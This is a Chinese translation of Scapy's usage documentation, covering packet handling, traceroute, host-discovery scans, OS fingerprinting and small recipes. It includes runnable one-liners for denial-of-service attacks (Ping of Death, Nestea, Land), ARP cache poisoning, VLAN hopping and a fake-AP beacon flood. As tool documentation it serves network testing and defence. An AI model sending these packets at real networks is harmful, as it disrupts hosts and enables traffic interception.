>>> pkts = sniff(count = 1) >>> pkt = pkts[0] >>> pkt <Ether dst=00:50:56:fc:ce:50 src=00:0c:29:2b:53:19 type=0x800 |<IP version=4L ihl=5L tos=0x0 len=84 id=0 flags=DF frag=0L ttl=64 proto=icmp chksum=0x5a7c src=192.168.25.130 dst=4.2.2.1 options='' |<ICMP type=echo-request code=0 chksum=0x9c90 id=0x5a61 seq=0x1 |<Raw load='\xe6\xdapI\xb6\xe5\x08\x00\x08\t\n \x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e \x1f !"#$%&\'()*+,-./01234567' |>>>> >>> pkt_str = str(pkt) >>> pkt_str '\x00PV\xfc\xceP\x00\x0c)+S\x19\x08\x00E\x00\x00T\x00\x00@\x00@\x01Z|\xc0\xa8 \x19\x82\x04\x02\x02\x01\x08\x00\x9c\x90Za\x00\x01\xe6\xdapI\xb6\xe5\x08\x00 \x08\t\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b \x1c\x1d\x1e\x1f !"#$%&\'()*+,-./01234567'

通過選擇合適的起始層(例如Ether()),我們可以重新導入十六進制字符串。

>>> new_pkt = Ether(pkt_str) >>> new_pkt <Ether dst=00:50:56:fc:ce:50 src=00:0c:29:2b:53:19 type=0x800 |<IP version=4L ihl=5L tos=0x0 len=84 id=0 flags=DF frag=0L ttl=64 proto=icmp chksum=0x5a7c src=192.168.25.130 dst=4.2.2.1 options='' |<ICMP type=echo-request code=0 chksum=0x9c90 id=0x5a61 seq=0x1 |<Raw load='\xe6\xdapI\xb6\xe5\x08\x00\x08\t\n \x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e \x1f !"#$%&\'()*+,-./01234567' |>>>>

Base64

使用export_object()函數,Scapy可以數據包轉換成base64編碼的Python數據結構:

>>> pkt <Ether dst=00:50:56:fc:ce:50 src=00:0c:29:2b:53:19 type=0x800 |<IP version=4L ihl=5L tos=0x0 len=84 id=0 flags=DF frag=0L ttl=64 proto=icmp chksum=0x5a7c src=192.168.25.130 dst=4.2.2.1 options='' |<ICMP type=echo-request code=0 chksum=0x9c90 id=0x5a61 seq=0x1 |<Raw load='\xe6\xdapI\xb6\xe5\x08\x00\x08\t\n \x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !"#$%&\'()*+,-./01234567' |>>>> >>> export_object(pkt) eNplVwd4FNcRPt2dTqdTQ0JUUYwN+CgS0gkJONFEs5WxFDB+CdiI8+pupVl0d7uzRUiYtcEGG4ST OD1OnB6nN6c4cXrvwQmk2U5xA9tgO70XMm+1rA78qdzbfTP/lDfzz7tD4WwmU1C0YiaT2Gqjaiao bMlhCrsUSYrYoKbmcxZFXSpPiohlZikm6ltb063ZdGpNOjWQ7mhPt62hChHJWTbFvb0O/u1MD2bT WZXXVCmi9pihUqI3FHdEQslriiVfWFTVT9VYpog6Q7fsjG0qRWtQNwsW1fRTrUg4xZxq5pUx1aS6 ...

使用import_object()函數,可以將以上輸出重新導入到Scapy中:

>>> new_pkt = import_object() eNplVwd4FNcRPt2dTqdTQ0JUUYwN+CgS0gkJONFEs5WxFDB+CdiI8+pupVl0d7uzRUiYtcEGG4ST OD1OnB6nN6c4cXrvwQmk2U5xA9tgO70XMm+1rA78qdzbfTP/lDfzz7tD4WwmU1C0YiaT2Gqjaiao bMlhCrsUSYrYoKbmcxZFXSpPiohlZikm6ltb063ZdGpNOjWQ7mhPt62hChHJWTbFvb0O/u1MD2bT WZXXVCmi9pihUqI3FHdEQslriiVfWFTVT9VYpog6Q7fsjG0qRWtQNwsW1fRTrUg4xZxq5pUx1aS6 ... >>> new_pkt <Ether dst=00:50:56:fc:ce:50 src=00:0c:29:2b:53:19 type=0x800 |<IP version=4L ihl=5L tos=0x0 len=84 id=0 flags=DF frag=0L ttl=64 proto=icmp chksum=0x5a7c src=192.168.25.130 dst=4.2.2.1 options='' |<ICMP type=echo-request code=0 chksum=0x9c90 id=0x5a61 seq=0x1 |<Raw load='\xe6\xdapI\xb6\xe5\x08\x00\x08\t\n \x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !"#$%&\'()*+,-./01234567' |>>>>

Sessions

最后可以使用save_session()函數來保存所有的session變量:

>>> dir() ['__builtins__', 'conf', 'new_pkt', 'pkt', 'pkt_export', 'pkt_hex', 'pkt_str', 'pkts'] >>> save_session("session.scapy")

使用load_session()函數,在下一次你啟動Scapy的時候你就能加載保存的session:

>>> dir() ['__builtins__', 'conf'] >>> load_session("session.scapy") >>> dir() ['__builtins__', 'conf', 'new_pkt', 'pkt', 'pkt_export', 'pkt_hex', 'pkt_str', 'pkts']

Making tables

現在我們來演示一下make_table()函數的功能。該函數的需要一個列表和另一個函數(返回包含三個元素的元組)作為參數。第一個元素是表格x軸上的一個值,第二個元素是y軸上的值,第三個原始則是坐標(x,y)對應的值,其返回結果為一個表格。這個函數有兩個變種,make_lined_table()和make_tex_table()來復制/粘貼到你的LaTeX報告中。這些函數都可以作為一個結果對象的方法:

在這里,我們可以看到一個多機并行的traceroute(Scapy的已經有一個多TCP路由跟蹤功能,待會兒可以看到):

>>> ans,unans=sr(IP(dst="www.test.fr/30", ttl=(1,6))/TCP()) Received 49 packets, got 24 answers, remaining 0 packets >>> ans.make_table( lambda (s,r): (s.dst, s.ttl, r.src) )216.15.189.192 216.15.189.193 216.15.189.194 216.15.189.195 1 192.168.8.1 192.168.8.1 192.168.8.1 192.168.8.1 2 81.57.239.254 81.57.239.254 81.57.239.254 81.57.239.254 3 213.228.4.254 213.228.4.254 213.228.4.254 213.228.4.254 4 213.228.3.3 213.228.3.3 213.228.3.3 213.228.3.3 5 193.251.254.1 193.251.251.69 193.251.254.1 193.251.251.69 6 193.251.241.174 193.251.241.178 193.251.241.174 193.251.241.178

這里有個更復雜的例子:從他們的IPID字段中識別主機。我們可以看到172.20.80.200只有22端口做出了應答,而172.20.80.201則對所有的端口都有應答,而且172.20.80.197對25端口沒有應答,但對其他端口都有應答。

>>> ans,unans=sr(IP(dst="172.20.80.192/28")/TCP(dport=[20,21,22,25,53,80])) Received 142 packets, got 25 answers, remaining 71 packets >>> ans.make_table(lambda (s,r): (s.dst, s.dport, r.sprintf("%IP.id%")))172.20.80.196 172.20.80.197 172.20.80.198 172.20.80.200 172.20.80.201 20 0 4203 7021 - 11562 21 0 4204 7022 - 11563 22 0 4205 7023 11561 11564 25 0 0 7024 - 11565 53 0 4207 7025 - 11566 80 0 4028 7026 - 11567

你在使用TTL和顯示接收到的TTL等情況下,它可以很輕松地幫你識別網絡拓撲結構。

Routing

現在Scapy有自己的路由表了,所以將你的數據包以不同于操作系統的方式路由:

>>> conf.route Network Netmask Gateway Iface 127.0.0.0 255.0.0.0 0.0.0.0 lo 192.168.8.0 255.255.255.0 0.0.0.0 eth0 0.0.0.0 0.0.0.0 192.168.8.1 eth0 >>> conf.route.delt(net="0.0.0.0/0",gw="192.168.8.1") >>> conf.route.add(net="0.0.0.0/0",gw="192.168.8.254") >>> conf.route.add(host="192.168.1.1",gw="192.168.8.1") >>> conf.route Network Netmask Gateway Iface 127.0.0.0 255.0.0.0 0.0.0.0 lo 192.168.8.0 255.255.255.0 0.0.0.0 eth0 0.0.0.0 0.0.0.0 192.168.8.254 eth0 192.168.1.1 255.255.255.255 192.168.8.1 eth0 >>> conf.route.resync() >>> conf.route Network Netmask Gateway Iface 127.0.0.0 255.0.0.0 0.0.0.0 lo 192.168.8.0 255.255.255.0 0.0.0.0 eth0 0.0.0.0 0.0.0.0 192.168.8.1 eth0

 Gnuplot

我們可以很容易地將收集起來的數據繪制成Gnuplot。(清確保你已經安裝了Gnuplot-py和Gnuplot)例如,我們可以通過觀察圖案知道負載平衡器用了多少個不同的IP堆棧:

>>> a,b=sr(IP(dst="www.target.com")/TCP(sport=[RandShort()]*1000)) >>> a.plot(lambda x:x[1].id) <Gnuplot._Gnuplot.Gnuplot instance at 0xb7d6a74c>

TCP traceroute (2)

Scapy也有強大的TCP traceroute功能。并不像其他traceroute程序那樣,需要等待每個節點的回應才去下一個節點,scapy會在同一時間發送所有的數據包。其缺點就是不知道什么時候停止(所以就有maxttl參數),其巨大的優點就是,只用了不到3秒,就可以得到多目標的traceroute結果:

>>> traceroute(["www.yahoo.com","www.altavista.com","www.wisenut.com","www.copernic.com"],maxttl=20) Received 80 packets, got 80 answers, remaining 0 packets193.45.10.88:80 216.109.118.79:80 64.241.242.243:80 66.94.229.254:80 1 192.168.8.1 192.168.8.1 192.168.8.1 192.168.8.1 2 82.243.5.254 82.243.5.254 82.243.5.254 82.243.5.254 3 213.228.4.254 213.228.4.254 213.228.4.254 213.228.4.254 4 212.27.50.46 212.27.50.46 212.27.50.46 212.27.50.46 5 212.27.50.37 212.27.50.41 212.27.50.37 212.27.50.41 6 212.27.50.34 212.27.50.34 213.228.3.234 193.251.251.69 7 213.248.71.141 217.118.239.149 208.184.231.214 193.251.241.178 8 213.248.65.81 217.118.224.44 64.125.31.129 193.251.242.98 9 213.248.70.14 213.206.129.85 64.125.31.186 193.251.243.89 10 193.45.10.88 SA 213.206.128.160 64.125.29.122 193.251.254.126 11 193.45.10.88 SA 206.24.169.41 64.125.28.70 216.115.97.178 12 193.45.10.88 SA 206.24.226.99 64.125.28.209 66.218.64.146 13 193.45.10.88 SA 206.24.227.106 64.125.29.45 66.218.82.230 14 193.45.10.88 SA 216.109.74.30 64.125.31.214 66.94.229.254 SA 15 193.45.10.88 SA 216.109.120.149 64.124.229.109 66.94.229.254 SA 16 193.45.10.88 SA 216.109.118.79 SA 64.241.242.243 SA 66.94.229.254 SA 17 193.45.10.88 SA 216.109.118.79 SA 64.241.242.243 SA 66.94.229.254 SA 18 193.45.10.88 SA 216.109.118.79 SA 64.241.242.243 SA 66.94.229.254 SA 19 193.45.10.88 SA 216.109.118.79 SA 64.241.242.243 SA 66.94.229.254 SA 20 193.45.10.88 SA 216.109.118.79 SA 64.241.242.243 SA 66.94.229.254 SA (<Traceroute: UDP:0 TCP:28 ICMP:52 Other:0>, <Unanswered: UDP:0 TCP:0 ICMP:0 Other:0>)

最后一行實際上是該函數的返回結果:traceroute返回一個對象和無應答數據包列表。traceroute返回的是一個經典返回對象更加特殊的版本(實際上是一個子類)。我們可以將其保存以備后用,或者是進行一些例如檢查填充的更深層次的觀察:

>>> result,unans=_ >>> result.show()193.45.10.88:80 216.109.118.79:80 64.241.242.243:80 66.94.229.254:80 1 192.168.8.1 192.168.8.1 192.168.8.1 192.168.8.1 2 82.251.4.254 82.251.4.254 82.251.4.254 82.251.4.254 3 213.228.4.254 213.228.4.254 213.228.4.254 213.228.4.254 [...] >>> result.filter(lambda x: Padding in x[1])

和其他返回對象一樣,traceroute對象也可以相加:

>>> r2,unans=traceroute(["www.voila.com"],maxttl=20) Received 19 packets, got 19 answers, remaining 1 packets195.101.94.25:80 1 192.168.8.1 2 82.251.4.254 3 213.228.4.254 4 212.27.50.169 5 212.27.50.162 6 193.252.161.97 7 193.252.103.86 8 193.252.103.77 9 193.252.101.1 10 193.252.227.245 12 195.101.94.25 SA 13 195.101.94.25 SA 14 195.101.94.25 SA 15 195.101.94.25 SA 16 195.101.94.25 SA 17 195.101.94.25 SA 18 195.101.94.25 SA 19 195.101.94.25 SA 20 195.101.94.25 SA >>> >>> r3=result+r2 >>> r3.show()195.101.94.25:80 212.23.37.13:80 216.109.118.72:80 64.241.242.243:80 66.94.229.254:80 1 192.168.8.1 192.168.8.1 192.168.8.1 192.168.8.1 192.168.8.1 2 82.251.4.254 82.251.4.254 82.251.4.254 82.251.4.254 82.251.4.254 3 213.228.4.254 213.228.4.254 213.228.4.254 213.228.4.254 213.228.4.254 4 212.27.50.169 212.27.50.169 212.27.50.46 - 212.27.50.46 5 212.27.50.162 212.27.50.162 212.27.50.37 212.27.50.41 212.27.50.37 6 193.252.161.97 194.68.129.168 212.27.50.34 213.228.3.234 193.251.251.69 7 193.252.103.86 212.23.42.33 217.118.239.185 208.184.231.214 193.251.241.178 8 193.252.103.77 212.23.42.6 217.118.224.44 64.125.31.129 193.251.242.98 9 193.252.101.1 212.23.37.13 SA 213.206.129.85 64.125.31.186 193.251.243.89 10 193.252.227.245 212.23.37.13 SA 213.206.128.160 64.125.29.122 193.251.254.126 11 - 212.23.37.13 SA 206.24.169.41 64.125.28.70 216.115.97.178 12 195.101.94.25 SA 212.23.37.13 SA 206.24.226.100 64.125.28.209 216.115.101.46 13 195.101.94.25 SA 212.23.37.13 SA 206.24.238.166 64.125.29.45 66.218.82.234 14 195.101.94.25 SA 212.23.37.13 SA 216.109.74.30 64.125.31.214 66.94.229.254 SA 15 195.101.94.25 SA 212.23.37.13 SA 216.109.120.151 64.124.229.109 66.94.229.254 SA 16 195.101.94.25 SA 212.23.37.13 SA 216.109.118.72 SA 64.241.242.243 SA 66.94.229.254 SA 17 195.101.94.25 SA 212.23.37.13 SA 216.109.118.72 SA 64.241.242.243 SA 66.94.229.254 SA 18 195.101.94.25 SA 212.23.37.13 SA 216.109.118.72 SA 64.241.242.243 SA 66.94.229.254 SA 19 195.101.94.25 SA 212.23.37.13 SA 216.109.118.72 SA 64.241.242.243 SA 66.94.229.254 SA 20 195.101.94.25 SA 212.23.37.13 SA 216.109.118.72 SA 64.241.242.243 SA 66.94.229.254 SA

Traceroute返回對象有一個非常實用的功能:他們會將得到的所有路線做成一個有向圖,并用AS組織路線。你需要安裝graphviz。在默認情況下會使用ImageMagick顯示圖形。

>>> res,unans = traceroute(["www.microsoft.com","www.cisco.com","www.yahoo.com","www.wanadoo.fr","www.pacsec.com"],dport=[80,443],maxttl=20,retry=-2) Received 190 packets, got 190 answers, remaining 10 packets193.252.122.103:443 193.252.122.103:80 198.133.219.25:443 198.133.219.25:80 207.46... 1 192.168.8.1 192.168.8.1 192.168.8.1 192.168.8.1 192.16... 2 82.251.4.254 82.251.4.254 82.251.4.254 82.251.4.254 82.251... 3 213.228.4.254 213.228.4.254 213.228.4.254 213.228.4.254 213.22... [...] >>> res.graph() # piped to ImageMagick's display program. Image below. >>> res.graph(type="ps",target="| lp") # piped to postscript printer >>> res.graph(target="> /tmp/graph.svg") # saved to file

如果你安裝了VPython,你就可以用3D來表示traceroute。右邊的按鈕是旋轉圖案,中間的按鈕是放大縮小,左邊的按鈕是移動圖案。如果你單擊一個球,它的IP地址就會出現/消失。如果你按住Ctrl單擊一個球,就會掃描21,22,23,25,80和443端口,并顯示結果:

>>> res.trace3D()

Wireless frame injection

frame injection的前提是你的無線網卡和驅動得正確配置好。

$ ifconfig wlan0 up $ iwpriv wlan0 hostapd 1 $ ifconfig wlan0ap up

你可以造一個FakeAP:

>>> sendp(Dot11(addr1="ff:ff:ff:ff:ff:ff",addr2=RandMAC(),addr3=RandMAC())/Dot11Beacon(cap="ESS")/Dot11Elt(ID="SSID",info=RandString(RandNum(1,50)))/Dot11Elt(ID="Rates",info='\x82\x84\x0b\x16')/Dot11Elt(ID="DSset",info="\x03")/Dot11Elt(ID="TIM",info="\x00\x01\x00\x00"),iface="wlan0ap",loop=1)

0x02 Simple one-liners

ACK Scan

使用Scapy強大的數據包功能,我們可以快速地復制經典的TCP掃描。例如,模擬ACK Scan將會發送以下字符串:

>>> ans,unans = sr(IP(dst="www.slashdot.org")/TCP(dport=[80,666],flags="A"))

我們可以在有應答的數據包中發現未過濾的端口:

>>> for s,r in ans: ... if s[TCP].dport == r[TCP].sport: ... print str(s[TCP].dport) + " is unfiltered"

同樣的,可以在無應答的數據包中發現過濾的端口:

>>> for s in unans: ... print str(s[TCP].dport) + " is filtered"

Xmas Scan

可以使用以下的命令來啟動Xmas Scan:

>>> ans,unans = sr(IP(dst="192.168.1.1")/TCP(dport=666,flags="FPU") )

有RST響應則意味著目標主機的對應端口是關閉的。

IP Scan

較低級的IP Scan可以用來枚舉支持的協議:

>>> ans,unans=sr(IP(dst="192.168.1.1",proto=(0,255))/"SCAPY",retry=2)

ARP Ping

在本地以太網絡上最快速地發現主機的方法莫過于ARP Ping了:

>>> ans,unans=srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst="192.168.1.0/24"),timeout=2)

用以下命令可以來審查應答:

>>> ans.summary(lambda (s,r): r.sprintf("%Ether.src% %ARP.psrc%") )

Scapy還包含內建函數arping(),該函數實現的功能和以上的兩個命令類似:

>>> arping("192.168.1.*")

 ICMP Ping

可以用以下的命令來模擬經典的ICMP Ping:

>>> ans,unans=sr(IP(dst="192.168.1.1-254")/ICMP())

用以下的命令可以收集存活主機的信息:

>>> ans.summary(lambda (s,r): r.sprintf("%IP.src% is alive") )

TCP Ping

如果ICMP echo請求被禁止了,我們依舊可以用不同的TCP Pings,就像下面的TCP SYN Ping:

>>> ans,unans=sr( IP(dst="192.168.1.*")/TCP(dport=80,flags="S") )

對我們的刺探有任何響應就意味著為一臺存活主機,可以用以下的命令收集結果:

>>> ans.summary( lambda(s,r) : r.sprintf("%IP.src% is alive") )

UDP Ping

如果其他的都失敗了,還可以使用UDP Ping,它可以讓存活主機產生ICMP Port unreachable錯誤。你可以挑選任何極有可能關閉的端口,就像端口0:

>>> ans,unans=sr( IP(dst="192.168.*.1-10")/UDP(dport=0) )

同樣的,使用以下命令收集結果:

>>> ans.summary( lambda(s,r) : r.sprintf("%IP.src% is alive") )

Classical attacks

Malformed packets:

>>> send(IP(dst="10.1.1.5", ihl=2, version=3)/ICMP())

Ping of death (Muuahahah):

>>> send( fragment(IP(dst="10.0.0.5")/ICMP()/("X"*60000)) )

Nestea attack:

>>> send(IP(dst=target, id=42, flags="MF")/UDP()/("X"*10)) >>> send(IP(dst=target, id=42, frag=48)/("X"*116)) >>> send(IP(dst=target, id=42, flags="MF")/UDP()/("X"*224))

Land attack (designed for Microsoft Windows):

>>> send(IP(src=target,dst=target)/TCP(sport=135,dport=135))

 ARP cache poisoning

這種攻擊可以通過VLAN跳躍攻擊投毒ARP緩存,使得其他客戶端無法加入真正的網關地址。

經典的ARP緩存投毒:    

>>> send( Ether(dst=clientMAC)/ARP(op="who-has", psrc=gateway, pdst=client),inter=RandNum(10,40), loop=1 )

使用double 802.1q封裝進行ARP緩存投毒:

>>> send( Ether(dst=clientMAC)/Dot1Q(vlan=1)/Dot1Q(vlan=2)/ARP(op="who-has", psrc=gateway, pdst=client),inter=RandNum(10,40), loop=1 )

TCP Port Scanning

發送一個TCP SYN到每一個端口上。等待一個SYN-ACK或者是RST或者是一個ICMP錯誤:

>>> res,unans = sr( IP(dst="target")/TCP(flags="S", dport=(1,1024)) )

將開放的端口結果可視化:

>>> res.nsummary( lfilter=lambda (s,r): (r.haslayer(TCP) and (r.getlayer(TCP).flags & 2)) )

IKE Scanning

我們試圖通過發送ISAKMP Security Association proposals來確定VPN集中器,并接收應答:

>>> res,unans = sr( IP(dst="192.168.1.*")/UDP()/ISAKMP(init_cookie=RandString(8), exch_type="identity prot.")/ISAKMP_payload_SA(prop=ISAKMP_payload_Proposal()))

可視化結果列表:

>>> res.nsummary(prn=lambda (s,r): r.src, lfilter=lambda (s,r): r.haslayer(ISAKMP) )

Advanced traceroute

TCP SYN traceroute

>>> ans,unans=sr(IP(dst="4.2.2.1",ttl=(1,10))/TCP(dport=53,flags="S"))

結果會是:

>>> ans.summary( lambda(s,r) : r.sprintf("%IP.src%\t{ICMP:%ICMP.type%}\t{TCP:%TCP.flags%}")) 192.168.1.1 time-exceeded 68.86.90.162 time-exceeded 4.79.43.134 time-exceeded 4.79.43.133 time-exceeded 4.68.18.126 time-exceeded 4.68.123.38 time-exceeded 4.2.2.1 SA

UDP traceroute

相比較TCP來說, traceroute一個UDP應用程序是不可靠的,因為ta沒有握手的過程。我們需要給一個應用性的有效載荷(DNS,ISAKMP,NTP等)來得到一個應答:

>>> res,unans = sr(IP(dst="target", ttl=(1,20))/UDP()/DNS(qd=DNSQR(qname="test.com"))

我們可以想象得到一個路由器列表的結果:

>>> res.make_table(lambda (s,r): (s.dst, s.ttl, r.src))

DNS traceroute

我們可以在traceroute()函數中設置l4參數為一個完整的數據包,來實現DNS traceroute:

>>> ans,unans=traceroute("4.2.2.1",l4=UDP(sport=RandShort())/DNS(qd=DNSQR(qname="thesprawl.org"))) Begin emission: ..*....******...******.***...****Finished to send 30 packets. *****...***............................... Received 75 packets, got 28 answers, remaining 2 packets4.2.2.1:udp53 1 192.168.1.1 11 4 68.86.90.162 11 5 4.79.43.134 11 6 4.79.43.133 11 7 4.68.18.62 11 8 4.68.123.6 11 9 4.2.2.1 ...

Etherleaking

>>> sr1(IP(dst="172.16.1.232")/ICMP()) <IP src=172.16.1.232 proto=1 [...] |<ICMP code=0 type=0 [...]| <Padding load=’0O\x02\x01\x00\x04\x06public\xa2B\x02\x02\x1e’ |>>>

ICMP leaking

這是一個Linux2.0的一個bug:

>>> sr1(IP(dst="172.16.1.1", options="\x02")/ICMP()) <IP src=172.16.1.1 [...] |<ICMP code=0 type=12 [...] | <IPerror src=172.16.1.24 options=’\x02\x00\x00\x00’ [...] | <ICMPerror code=0 type=8 id=0x0 seq=0x0 chksum=0xf7ff | <Padding load=’\x00[...]\x00\x1d.\x00V\x1f\xaf\xd9\xd4;\xca’ |>>>>>

VLAN hopping

在非常特殊的情況下,使用double 802.1q封裝,可以將一個數據包跳到另一個VLAN中:

>>> sendp(Ether()/Dot1Q(vlan=2)/Dot1Q(vlan=7)/IP(dst=target)/ICMP())

Wireless sniffing

以下的命令將會像大多數的無線嗅探器那樣顯示信息:

>>> sniff(iface="ath0",prn=lambda x:x.sprintf("{Dot11Beacon:%Dot11.addr3%\t%Dot11Beacon.info%\t%PrismHeader.channel%\tDot11Beacon.cap%}"))

以上命令會產生類似如下的輸出:

00:00:00:01:02:03 netgear 6L ESS+privacy+PBCC 11:22:33:44:55:66 wireless_100 6L short-slot+ESS+privacy 44:55:66:00:11:22 linksys 6L short-slot+ESS+privacy 12:34:56:78:90:12 NETGEAR 6L short-slot+ESS+privacy+short-preamble

0x03 Recipes

Simplistic ARP Monitor

以下的程序使用了sniff()函數的回調功能(prn參數)。將store參數設置為0,就可以使sniff()函數不存儲任何數據(否則會存儲),所以就可以一直嗅探下去。filter參數
則用于在高負荷的情況下有更好的性能:filter會在內核中應用,而且Scapy就只能嗅探到ARP流量。

#! /usr/bin/env python from scapy.all import *def arp_monitor_callback(pkt):if ARP in pkt and pkt[ARP].op in (1,2): #who-has or is-atreturn pkt.sprintf("%ARP.hwsrc% %ARP.psrc%")sniff(prn=arp_monitor_callback, filter="arp", store=0)

Identifying rogue DHCP servers on your LAN

Problem

你懷疑有人已經在你的LAN中安裝了額外的未經授權的DHCP服務器-無論是故意的還是有意的。因此你想要檢查是否有任何活動的DHCP服務器,并確定他們的IP和MAC地址。

Solution

使用Scapy發送一個DHCP發現請求,并分析應答:

>>> conf.checkIPaddr = False >>> fam,hw = get_if_raw_hwaddr(conf.iface) >>> dhcp_discover = Ether(dst="ff:ff:ff:ff:ff:ff")/IP(src="0.0.0.0",dst="255.255.255.255")/UDP(sport=68,dport=67)/BOOTP(chaddr=hw)/DHCP(options=[("message-type","discover"),"end"]) >>> ans, unans = srp(dhcp_discover, multi=True) # Press CTRL-C after several seconds Begin emission: Finished to send 1 packets. .*...*.. Received 8 packets, got 2 answers, remaining 0 packets

在這種情況下,我們得到了兩個應答,所以測試網絡上有兩個活動的DHCP服務器:

>>> ans.summarize() Ether / IP / UDP 0.0.0.0:bootpc > 255.255.255.255:bootps / BOOTP / DHCP ==> Ether / IP / UDP 192.168.1.1:bootps > 255.255.255.255:bootpc / BOOTP / DHCP Ether / IP / UDP 0.0.0.0:bootpc > 255.255.255.255:bootps / BOOTP / DHCP ==> Ether / IP / UDP 192.168.1.11:bootps > 255.255.255.255:bootpc / BOOTP / DHCP }}} We are only interested in the MAC and IP addresses of the replies: {{{ >>> for p in ans: print p[1][Ether].src, p[1][IP].src ... 00:de:ad:be:ef:00 192.168.1.1 00:11:11:22:22:33 192.168.1.11

Discussion

我們設置multi=True來確保Scapy在接收到第一個響應之后可以等待更多的應答數據包。這也就是我們為什么不用更方便的dhcp_request()函數,而是手動地構造DCHP數據包的原因:dhcp_request()使用srp1()來發送和接收數據包,這樣在接收到一個應答數據包之后就會立即返回。

此外,Scapy通常確保應答來源于之前發送請求的目的地址。但是我們的DHCP數據包被發送到IP廣播地址(255.255.255.255),任何應答數據包都將回復DCHP服務器的IP地址作為其源IP地址(e.g. 192.168.1.1)。由于這些IP地址不匹配,我們必須在發送請求前使用conf.checkIPaddr = False來禁用Scapy的check。

See also

Firewalking

TTL減一操作過濾后,只有沒被過濾的數據包會產生一個ICMP TTL超時

>>> ans, unans = sr(IP(dst="172.16.4.27", ttl=16)/TCP(dport=(1,1024))) >>> for s,r in ans:if r.haslayer(ICMP) and r.payload.type == 11:print s.dport

在對多網卡的防火墻查找子網時,只有它自己的網卡IP可以達到這個TTL:

>>> ans, unans = sr(IP(dst="172.16.5/24", ttl=15)/TCP()) >>> for i in unans: print i.dst

TCP Timestamp Filtering

Problem

在比較流行的端口掃描器中,一種常見的情況就是沒有設置TCP時間戳選項,而許多防火墻都包含一條規則來丟棄這樣的TCP數據包。

Solution

為了讓Scapy能夠到達其他位置,就必須使用其他選項:

>>> sr1(IP(dst="72.14.207.99")/TCP(dport=80,flags="S",options=[('Timestamp',(0,0))]))

Viewing packets with Wireshark

Problem

你已經使用Scapy收集或者嗅探了一些數據包,因為Wireshark高級的數據包展示功能,你想使用Wireshark查看這些數據包。

Solution

正好可以使用wireshark()函數:

>>> packets = Ether()/IP(dst=Net("google.com/30"))/ICMP() # first generate some packets >>> wireshark(packets) # show them with Wireshark

Discussion

wireshark()函數可以生成一個臨時pcap文件,來包含你的數據包,然后會在后臺啟動Wireshark,使其在啟動時讀取該文件。

請記住Wireshark是處理第二層的數據包(通常被稱為“幀”)。所以我們必須為ICMP數據包添加一個Ether()頭。如果你直接將IP數據包(第三層)傳遞給Wireshark,你將會得到一個奇怪的結果。

你可以通過改變conf.prog.wireshark的配置設置,來告訴Scapy去哪尋找Wireshark可執行文件。

OS Fingerprinting

ISN

Scapy的可用于分析ISN(初始序列號)遞增來發現可能有漏洞的系統。首先我們將在一個循環中發送SYN探頭,來收集目標響應:

>>> ans,unans=srloop(IP(dst="192.168.1.1")/TCP(dport=80,flags="S"))

一旦我們得到響應之后,我們可以像這樣開始分析收集到的數據:

>>> temp = 0 >>> for s,r in ans: ... temp = r[TCP].seq - temp ... print str(r[TCP].seq) + "\t+" + str(temp) ... 4278709328 +4275758673 4279655607 +3896934 4280642461 +4276745527 4281648240 +4902713 4282645099 +4277742386 4283643696 +5901310

nmap_fp

在Scapy中支持Nmap指紋識別(是到Nmap v4.20的“第一代”功能)。在Scapy v2中,你首先得加載擴展模塊:

>>> load_module("nmap")

如果你已經安裝了Nmap,你可以讓Scapy使用它的主動操作系統指紋數據庫。清確保version 1簽名數據庫位于指定的路徑:

>>> conf.nmap_base

然后你可以使用namp_fp()函數,該函數和Nmap操作系統檢測引擎使用同樣的探針:

>>> nmap_fp("192.168.1.1",oport=443,cport=1) Begin emission: .****..**Finished to send 8 packets. *................................................ Received 58 packets, got 7 answers, remaining 1 packets (1.0, ['Linux 2.4.0 - 2.5.20', 'Linux 2.4.19 w/grsecurity patch', 'Linux 2.4.20 - 2.4.22 w/grsecurity.org patch', 'Linux 2.4.22-ck2 (x86) w/grsecurity.org and HZ=1000 patches', 'Linux 2.4.7 - 2.6.11'])

p0f

如果你已在操作系統中安裝了p0f,你可以直接從Scapy中使用它來猜測操作系統名稱和版本。(僅在SYN數據庫被使用時)。首先要確保p0f數據庫存在于指定的路徑:

>>> conf.p0f_base

例如,根據一個捕獲的數據包猜測操作系統:

>>> sniff(prn=prnp0f) 192.168.1.100:54716 - Linux 2.6 (newer, 1) (up: 24 hrs)-> 74.125.19.104:www (distance 0) <Sniffed: TCP:339 UDP:2 ICMP:0 Other:156>

總結

以上是生活随笔為你收集整理的Scapy 中文文档:三、使用方法的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

